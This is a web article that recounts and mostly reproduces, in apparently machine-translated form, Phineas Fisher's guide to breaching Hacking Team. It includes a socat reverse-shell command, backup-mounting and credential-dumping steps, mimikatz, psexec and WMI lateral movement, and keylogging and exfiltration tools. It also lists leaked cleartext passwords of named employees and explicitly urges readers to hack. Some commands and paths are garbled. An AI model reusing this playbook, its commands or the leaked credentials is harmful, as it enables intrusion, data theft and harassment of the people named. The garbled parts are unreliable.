Phineas Fisher explains how he hacked Hacking Team

Hacking Team's leak was worldwide news, but nobody knew much about the author or how he did it. That mystery has finally been revealed. After eight months of almost complete silence, Phineas Fisher, the pseudonym behind the person who carried out the attack, has published a guide in Spanish DIY (Do It Yourself) with a detailed explanation of the tools and how he broke the security of the company's systems and uncovered its best kept secrets, as some of its clients in Spain: the CNI, the Civil Guard and the Police.

Hacking Team was a company that helped governments to hack and spy on journalists, activists, political opponents, and other threats to their power And, very occasionally, to criminals and terrorists A Vincenzetti, the CEO, liked to finish his emails with the fascist slogan "boia chi molla". It would be more successful "boia chi sells RCS". They also claimed to have technology to solve the "problem" of Tor and the darknet

Phineas Fisher snuck into the hacking team network silently and leaked more than 400 gigabytes of data, but it also serves as a manifesto of his political ideals and the motives behind access. 

Before someone had to sneak into the offices to filter documents. A gun was needed to rob a bank. Today you can do it from the bed with a laptop in your hands As the CNT said after the hacking of the Gamma Group: "we will try to take a step forward with new forms of struggle". Hacking is a powerful tool, let's learn and fight! 

At the end of the guide the author comments:

And that's all it takes to end a business and end its human rights abuses
With only 100 hours of work, a person can undo years of work from a multi-million dollar company. 

In the guide, Phineas Fisher encourages others to follow his example

Phineas Fisher argued that leaking documents to demonstrate corruption and abuse of power is really " ethical hacking ," instead of doing consulting work for companies that are often the ones that really deserve to be hacked. 

Hacking Team is an Italian company that sells spyware and hacking services to police and intelligence services around the world. Over the years, researchers have documented several cases in which Hacking Team tools were used against journalists, dissidents, or activists. 

On the night that the hacker published the data, he revealed himself to be the same person who in 2014 also hacked Gamma International, a competitor of a hacker team that sells spyware called FinFisher. 

 For months, however, a big question has gone unanswered: how the hacker managed to baffle and completely own a company whose business model depended exactly on hacking other people? 

At that moment, the hacker promised that he would soon tell the world. I just wanted to wait a little while, he said on Twitter, until the Hacking team "had a little time to fail to figure out what happened and get out of business." 

In his guide, published on Friday, the hacker explained how an unknown vulnerability is used ,or day zero (0day), to obtain the first point of support in the internal network of Hacking Team. Keeping in mind that the bug has not yet been patched, however, Phineas Fisher did not provide any details about what the vulnerability is exactly, or where it found it. 

After entering, the hacker said he moved around carefully, first downloading emails, then accessing other servers and parts of the network. Having administrative privileges obtained within the company's main Windows network, Phineas Fisher said that spying on system administrators, especially Cristiana Pozzi, given that they generally have access to the entire network. After having stolen Pozzi's passwordsthe record of his keystrokes , the hacker said he accessed and exfiltrated all the source code of the company, which is housed in a separate isolated network. 

At that point, the hacking Team Twitter password is reset with the "Forgot your password" function, and on July 5, it announced the hack using the company's own Twitter account.

The hacker said that he was inside the Hacking Team network for six weeks, and that it took him about 100 hours of work to get around and get all the data. Judging by his words, it is clear Phineas Fisher had a strong political motivation for the Hacking Team's computer attack.

I want to dedicate this guide for the victims of the assault to the school Armando DĂ­az, and all those who had the blood shed by the Italian fascists

In reference to the bloody raid on the Italian school in Genoa in 2001, where police forces broke into a school where they lodged against the G-8 Genao Social Forum activists, resulting in the arrest of 93 activists. The methods of the raid and subsequent arrest, however, were so controversial that 125 policemen were brought to trial, accused of beating and torturing the detainees. 

The hacker also rejected being defined as a vigilante, and opted for a more political definition.

"I characterize myself as an anarchist revolutionary, not as a vigilante," he said in an email. "The vigilantes act outside the system, but intend to carry out the work of the judicial system, the police and none of which I am a fan of, I am clearly a criminal, it is not clear if hacking equipment has done anything illegal. If someone, the piracy of the team are the vigilantes, who acts on the margins in search of their love for authority and law and order. "

Hacking allows the weakest gives the opportunity to fight and win

Hacking is a powerful tool. Let's learn and fight!

He wrote, citing the anarcho-syndicalist union National Labor Commission, or CNT. After Phineas Fisher hacked Grupo Gamma in 2014, the CNT said that clear technology was just another front in the class struggle, and that it was time to "take a step forward" with "new forms of struggle." 

It is impossible to verify if all the details in the guide are true, since none of the hacking teams or the Italian authorities have made known everything related to the hack.

"Any comments should come from the Italian law enforcement authorities who have been investigating the attack on the computer piracy, so there is no comment from the company," Hacking Team spokesman Eric Rabe said in an email. The Italian prosecutor's office could not be reached for comment. 

It is not clear how the investigation is going, but Phineas Fisher does not seem too concerned about whether he will be caughtIn another section of his guide, he described Hacking Team as a company that helped governments spy on activists, journalists, political opponents, and "very occasionally" criminals and terrorists. The hacker also referred to the piracy claims of the team that was developing technology to track criminals using the Tor network and on the dark web. 

"But considering that I'm still free," Snarkily wrote, "I have doubts about its effectiveness."


It often comes out in the news that they have attributed an attack to a group of government hackers (the " APT s"), because they always use the same tools, leave the same footprints, and even use the same infrastructure (domains, emails etc). They are negligent because they can hack without legal consequences. 

I did not want to make the work of the police easier and relate the Hacking Team with the hacks and nicknames of my daily work as a black glove hacker. So I used new servers and domains, registered with new emails and paid with new bitcoin addresses. In addition, I only used public tools and things that I wrote especially for this attack and changed my way of doing some things so as not to leave my normal forensic footprint.

After the Gamma Group hack, I described a process to look for vulnerabilities. 

 Hacking Team has a public IP range: 
inetnum: - 
descr: HT public subnet

Hacking Team had very little exposed on the internet. For example, unlike Gamma Group, your customer service site needs a customer's certificate to connect. What he had was his main website (a Joomla blog where Joomscan does not reveal any serious flaws), a mail server, a couple of routers, two VPN devices, and a device to filter spam. Then I had three options:

  1. look for a 0day in Joomla, 
  2. look for a 0day in postfix, or
  3.  look for a 0day in one of the embedded systems. A 0day in an embedded system seemed to me the most achievable option, and after two weeks of reverse engineering work, I achieved a remote root exploit. Since the vulnerabilities have not yet been patched, I will not give more details. 

There is a lot of work and testing before using the exploit against Hacking Team. 

Wrote a firmware with backdoor, and compiled several post-exploitation tools for the embedded system. The backdoor serves to protect the exploit. Using the exploit only once and then returning through the backdoor makes it more difficult to discover and patch the vulnerabilities.

Tools used in the attack to Hacking Team

The post-exploitation tools I had prepared were:

  • 1) busybox For all common UNIX utilities that the system does not have
  • 2) nmap To scan and fingerprint the internal Hacking Team network.
  • 3) The most useful tool to attack Windows networks when you have access to the internal network but do not have a domain user.
  • 4) Python To run
  • 5) tcpdump To sniff traffic.
  • 6) dsniff To spy passwords of weak protocols like ftp, and to do
  • arpspoofing. I wanted to use ettercap, written by the same ALoR and NaGA from Hacking Team, but it was difficult to compile it for the system.
  • 7) socat For a comfortable shell with pty: my_server: socat file: `tty`, raw, echo = 0 tcp-listen: my_port system hacked: socat exec: 'bash -li', pty, stderr, setsid, sigint, sane \ tcp: my_server: my_port And for many more things, it's a Swiss army knife. See the examples section of your documentation.
  • 8) screen As the pty of socat, it is not strictly necessary, but I wanted to feel at home in the Hacking Team networks.
  • 9) a SOCKS proxy server To use together with proxychains to access the internal network with any other program.
  • 10) tgcd To forward ports, like the SOCKS server, through the firewall.

The worst that could happen was that my backdoor or post-exploitation tools left the system unstable and had an employee investigate it. Therefore, I spent a week testing my exploit, backdoor, and post-exploitation tools on the networks of other vulnerable companies before entering the Hacking Team network.

NoSQL database

NoSQL, or rather NoAutentication, has been a great gift to the hacker community. When I worry that they finally patched all the failures of omitting authentication in MySQL [2] [3] [4] [5], new databases become fashionable without authentication by design. Nmap finds a few on the 
internal network of Hacking Team:

27017 / tcp open mongodb MongoDB 2.6.5 
ok = 1 
totalSizeMb = 47547 
totalSize = 49856643072 
| _ version = 2.6.5 

27017 / tcp open mongodb MongoDB 2.6.5 
ok = 1 
totalSizeMb = 31987 
totalSize = 33540800512 
| _ version = 2.6.5

Were the databases for RCS test instances. The audio recorded by RCS is saved in MongoDB with GridFS. The audio folder in the torrent [6] comes from this. They spied on themselves unintentionally. 

Although it was fun to listen to recordings and see webcam images of Hacking Team developing their malware, it was not very useful. Their insecure backups were the vulnerability that opened their doors . According to its documentation [1], its iSCSI devices must be in a separate network, but nmap finds ones in its subnet 

Nmap scan report for ht-synology.hackingteam.local ( 
3260 / tcp open iscsi? 
| _ Authentication: No authentication required 

Nmap scan report for synology-backup.hackingteam.local ( 
3260 / tcp open iscsi? 
| _ Authentication: No authentication required

and we found backup copies of several virtual machines. The Exchange server seems the most interesting. It's too big to download, but we can mount it remotely and look for interesting files:

$ losetup / dev / loop0 
$ fdisk -l / dev / loop0 
/ dev / loop0p1 2048 1258287103 629142528 7 HPFS / NTFS / exFAT

then the offset is 2048 * 512 = 1048576

$ losetup -o 1048576 / dev / loop1 / dev / loop0 
$ mount -o ro / dev / loop1 / mnt / exchange /

now in / mnt / exchange / WindowsImageBackup / EXCHANGE / Backup 2014-10-14 172311 
we find the hard disk of the virtual machine, and assemble it:

vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd / mnt / vhd-disk / 
mount -o loop / mnt / vhd-disk / Partition1 / mnt / part1

... and finally we have unpacked the Russian doll and we can see all the files of the old Exchange server in / mnt / part1

 What were the passwords of the Hacking Team administrators?

What interests me most about the backup is to find out if you have a password or hash that you can use to access the current server. Use pwdump, cachedump, and lsadump [1] with the registry files. lsadump finds the password for the besadmin service account:

_SC_BlackBerry MDS Connection Service 
0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 bes3. 
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00!.!.! ...........

I use proxychains [2] with the server socks in the embedded system and smbclient [3] to check the password:

proxychins smbclient '//$' -U 'hackingteam.local / besadmin% bes32678 !!!'

!Works! The besadmin password is still valid, and it is a local administrator. I use my proxy and psexec_psh from metasploit [4] to get a meterpreter session. Then I migrate to a 64-bit process, "load kiwi" [5], "creds_wdigest", and I already have many passwords, including the domain administrator's 

password Hacking Team employees' passwords were:

HACKINGTEAM BESAdmin bes32678 !!! 
HACKINGTEAM Administrator uu8dd8ndd12! 
HACKINGTEAM c.pozzi P4ssword 
HACKINGTEAM m.romeo ioLK / (90 
HACKINGTEAM l. War 4luc@=.= 
HACKINGTEAM d.martinez W4tudul3sp 
HACKINGTEAM g.russo GCBr0s0705! 
HACKINGTEAM a.scarafile Cd4432996111 
HACKINGTEAM r.viscardi Ht2015! 
HACKINGTEAM a.mino A! e $$ andra 
HACKINGTEAM m.bettini Ettore & Bella0314 
HACKINGTEAM m.luppi Blackou7 
HACKINGTEAM s.gallucci 1S9i8m4o! 
HACKINGTEAM d.milan set! dob66 
HACKINGTEAM w.furlan Blu3.B3rry! 
HACKINGTEAM d.romualdi Rd13136f @ # 
HACKINGTEAM l.invernizzi L0r3nz0123! 
HACKINGTEAM e .ciceri 2O2571 & 2E
HACKINGTEAM e.rabe erab @ 4HT!
Powerful attention to Cristina Pozzi's password: P

Introduction to Windows Domain Hacking

I will give a brief review of the techniques to spread within a Windows network. The techniques to run remotely require the password or hash of a local administrator on the target. By far the most common way to get these credentials is to use mimikatz [1], especially sekurlsa :: logonpasswords and sekurlsa :: msv, on computers where you already have administrative access. Movement techniques "in situ" also require administrative privileges (except for runes). The most important tools for privilege escalation are PowerUp [2], and bypassuac [3]. 

Remote Motion: 

1) psexec

The basic and proven way of movement in windows networks. You can use psexec [1], winexe [2], psexec_psh from metasploit [3], invoke_psexec from powershell empire [4], or the windows command "sc" [5]. For the module metasploit, powershell empire, and pth-winexe [6], just know the hash without knowing the password. It is the most universal way (it works on any computer with open port 445), but also the least cautious way. The type 7045 "Service Control Manager" will appear in the event log. In my experience, they have never noticed it during a hack, but sometimes they notice it later and it helps researchers understand what the hacker has done. 

2) WMI

The most cautious way. The WMI service is enabled on all windows computers, but except for servers, the firewall blocks it by default. You can use [7], pth-wmis [6] (here they have a demonstration of wmiexec and pth-wmis [8]), invoke_wmi of powershell empire [9], or the command of windows wmic [5]. All except wmic only need the hash. 

3) PSRemoting [10] 

It is disabled by default, and I do not advise you to enable new protocols that are not necessary. But if the sysadmin has already enabled it, it is very convenient, especially if you use powershell for everything (and yes,
you should use powershell for almost everything, it's going to change [11] with powershell 5 and windows 10, but nowadays powershell makes it easy to do everything in RAM, dodge antivirus, and leave few traces). 

4) Scheduled tasks 

Remote programs can be executed with at and schtasks [5]. It works in the same situations as psexec, and also leaves known traces [12]. 

5) GPO

If all these protocols are disabled or blocked by the firewall, once you are the administrator of the domain, you can use GPO to give a logon script, install a msi, execute a scheduled task [13], or as we will see with the Mauro Romeo's computer (sysadmin of Hacking 
Team), enable WMI and open the firewall through GPO. 

Movement "in situ":

1) Impersonalizing Tokens 

Once you have administrative access to a computer, you can use the tokens of other users to access resources in the domain. Two tools to do this are incognito [1] and the token :: * commands of mimikatz [2]. 

2) MS14-068 

A validation failure in kerberos can be used to generate a domain administrator ticket [3] [4] [5]. 

3) Pass the Hash 

If you have your hash but the user does not have a session started, you can use sekurlsa :: pth [2] to get a ticket from the user. 

4) Process Injection

Any RAT can be injected into another process, for example the command migrate in meterpreter and pupy [6] or psinject [7] in powershell empire. You can inject to the process that has the token that you want. 

5) runes 

This is sometimes very useful because it does not require administrator privileges. The command is part of windows, but if you do not have a graphical interface you can use powershell [8].

Persistence: maintain access

Once you have access, you want to keep it. Actually, persistence is just a challenge for bastards like those of Hacking Team who want to hack activists or other individuals. To hack companies, you do not need persistence because companies never sleep. I always use "persistence" like duqu 2, run in RAM on a pair of servers with high percentages of uptime. In the hypothetical case that everyone restarts at the same time, I have passwords and a gold ticket [1] for reserve access. You can read more information about the persistence mechanisms for windows here [2] [3] [4]. But to hack companies, it is not necessary and the risk of detection increases.

The best tool today to understand Windows networks is Powerview [1]. It is worth reading everything written by the author [2], first of all [3], [4], [5], and [6]. Powershell itself is also very powerful [7]. As there are still many servers 2003 and 2000 without powershell, you also have to learn the old school [8], with tools like netview.exe [9] or the windows command "net view". Other techniques that I like are: 

1) Download a list of file names 

With a domain administrator account, you can download all file names in the network with powerview:

Invoke-ShareFinderThreaded -ExcludedShares IPC $, PRINT $, ADMIN $ | 
select-string '^ (. *) \ t-' | % {dir -recurse $ _. Matches [0] .Groups [1] | 
select fullname | out-file -append files.txt}

Later, you can read it at your own pace and choose which ones you want to download. 

2) Read emails 

As we have seen, you can download emails with powershell, and they have a lot of useful information. 

3) Read sharepoint 

It is another place where many companies have important information. It can be downloaded with powershell [10]. 

4) Active Directory [11] 

It has a lot of useful information about users and computers. Without being a domain administrator, you can already find a lot of information with powerview and other tools [12]. After getting domain administrator you should export all AD information with csvde or another tool. 

5) Spy on employees

One of my favorite hobbies is hunting the sysadmins. Spying on Christan Pozzi (sysadmin of Hacking Team) I got access to the Nagios server that gave me access to the rete sviluppo (development network with the RCS source code). With a simple combination of Get-Keystrokes and Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang [14], and GPO, you can spy on any employee or even the entire domain.

When I read the documentation of their infrastructure [1], I realized that I still lacked access to something important - the "Rete Sviluppo", an isolated network that stores all the source code of RCS. The sysadmins of a company always have access to everything. I searched the computers of Mauro Romeo and Christian Pozzi to see how they manage the sviluppo network, and to see if there were other interesting systems that I should investigate. It was easy to access their computers since they were part of the Windows domain in which they had administrator. Mauro Romeo's computer had no open port, so I opened the WMI port [2] to run meterpreter [3]. In addition to recording keys and captures with Get-Keystrokes and Get-TimedScreenshot, I used many modules / gather / of metasploit, CredMan.ps1 [4], and searched for files [5]. When I saw that Pozzi had a Truecrypt volume, I waited until I had mounted it to copy the files then. Many have laughed at the weak passwords of Christian Pozzi (and Christian Pozzi in general, offers enough material for comedy [6] [7] [8] [9]). I included them in the filtration as an oversight and to laugh at him. The reality is that mimikatz and keyloggers see all the same passwords.

Within the encrypted volume of Christian Pozzi, there was a textfile with many passwords [1]. One of them was for a Fully Automated Nagios server, which had access to the sviluppo network to monitor it. I had found the bridge. I only had the password for the web interface, but there was a public exploit [2] to execute code and get a shell (it is an exploit not authenticated, but it is necessary for a user to have logged in for which I used the textfile password).

Reading the emails, I had seen Daniele Milan granting access to git repositories. I already had your windows password thanks to mimikatz. I tried it with the git server and it worked. I tried sudo and it worked. For the gitlab server and its twitter account, I used the function "forgot my password", and my access to the mail server to reset the password.

Hacking guides usually end with a warning: this information is for educational purposes only, be an ethical hacker, not attack computers without permission, blablablá. I will say the same, but with a more rebellious concept of "ethical" hacking. It would be ethical hacking to filter documents, expropriate money to banks, and protect the computers of ordinary people. However, most people who call themselves "ethical hackers" work only to protect those who pay their consulting fee, which are often the ones that deserve the most hacking.

In Hacking Team they see themselves as part of a tradition of inspiring Italian design [1]. I see Vincenzetti, his company, and his cronies from the police, police, and government, as part of a long tradition of Italian fascism. I want to dedicate this guide to the victims of the assault on the Armando Diaz school, and to all those who have shed their blood at the hands of Italian fascists. 


Previous Post Next Post